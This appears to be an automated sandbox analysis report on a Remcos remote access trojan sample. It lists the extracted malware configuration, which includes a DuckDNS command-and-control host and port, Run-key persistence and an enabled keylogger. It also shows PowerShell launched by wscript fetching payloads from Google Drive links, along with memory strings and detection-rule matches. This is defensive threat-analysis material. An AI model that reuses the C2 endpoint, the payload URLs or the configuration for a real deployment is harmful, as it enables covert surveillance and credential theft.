Source: 00000007.00000002.1905132291.0000000009B28000.00000004.00000020.00020000.00000000.sdmp |
Malware Configuration Extractor: Remcos {"Host:Port:Password": "a458386d9.duckdns.org:3256:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "Rmc-WDQFG0", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"} |
Source: unknown |
HTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.8:49705 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.8:49706 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.8:49708 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.8:49709 version: TLS 1.2 |
Source: |
Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1921976127.0000000008A50000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: m.Core.pdb4 source: powershell.exe, 00000005.00000002.1914298768.0000000007932000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: ore.pdbht source: powershell.exe, 00000005.00000002.1914298768.0000000007932000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: em.Core.pdbk source: powershell.exe, 00000005.00000002.1914298768.00000000078E8000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: em.Core.pdb source: powershell.exe, 00000005.00000002.1914298768.00000000078E8000.00000004.00000020.00020000.00000000.sdmp |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1ZdybZY4WrMwYKbuTlGVANt9wXhqlWSBc HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /download?id=1ZdybZY4WrMwYKbuTlGVANt9wXhqlWSBc&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=196IYHEN42PTEDpTMlvc3osZSDWP6_3Rd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /download?id=196IYHEN42PTEDpTMlvc3osZSDWP6_3Rd&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive |
Source: powershell.exe, 00000002.00000002.1583462169.0000029181C5A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.google.com |
Source: powershell.exe, 00000002.00000002.1583462169.0000029181C93000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.usercontent.google.com |
Source: powershell.exe, 00000002.00000002.1610119241.0000029190071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1906272544.0000000005FD9000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000005.00000002.1885917031.00000000050C8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000002.00000002.1583462169.0000029180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1885917031.0000000004F71000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000005.00000002.1885917031.00000000050C8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000002.00000002.1583462169.0000029180001000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000005.00000002.1885917031.0000000004F71000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 00000002.00000002.1583462169.0000029181C7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029180490000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://apis.google.com |
Source: powershell.exe, 00000005.00000002.1906272544.0000000005FD9000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000005.00000002.1906272544.0000000005FD9000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000005.00000002.1906272544.0000000005FD9000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000002.00000002.1583462169.0000029181C55000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.googP2 |
Source: powershell.exe, 00000002.00000002.1583462169.0000029180227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.000002918190F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com |
Source: powershell.exe, 00000002.00000002.1583462169.0000029180227000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1ZdybZY4WrMwYKbuTlGVANt9wXhqlWSBcP |
Source: powershell.exe, 00000005.00000002.1885917031.00000000050C8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1ZdybZY4WrMwYKbuTlGVANt9wXhqlWSBcXRul |
Source: powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.googh |
Source: powershell.exe, 00000002.00000002.1583462169.0000029180494000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com |
Source: powershell.exe, 00000002.00000002.1583462169.0000029180494000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=1ZdybZY4WrMwYKbuTlGVANt9wXhqlWSBc&export=download |
Source: powershell.exe, 00000005.00000002.1885917031.00000000050C8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.1583462169.0000029180BE0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000002.00000002.1610119241.0000029190071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1906272544.0000000005FD9000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000002.00000002.1583462169.0000029181C7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029180490000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ssl.gstatic.com |
Source: powershell.exe, 00000002.00000002.1583462169.0000029181C7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029180490000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google-analytics.com;report-uri |
Source: powershell.exe, 00000002.00000002.1583462169.0000029181C7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029180490000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: powershell.exe, 00000002.00000002.1583462169.0000029181C7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029180490000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.googletagmanager.com |
Source: powershell.exe, 00000002.00000002.1583462169.0000029181C7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029181C80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1583462169.0000029180490000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.gstatic.com |
Source: unknown |
Network traffic detected: HTTP traffic on port 49708 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49709 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49706 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49705 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49709 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49708 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49706 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49705 |
Source: amsi32_8088.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7756, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 8088, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" |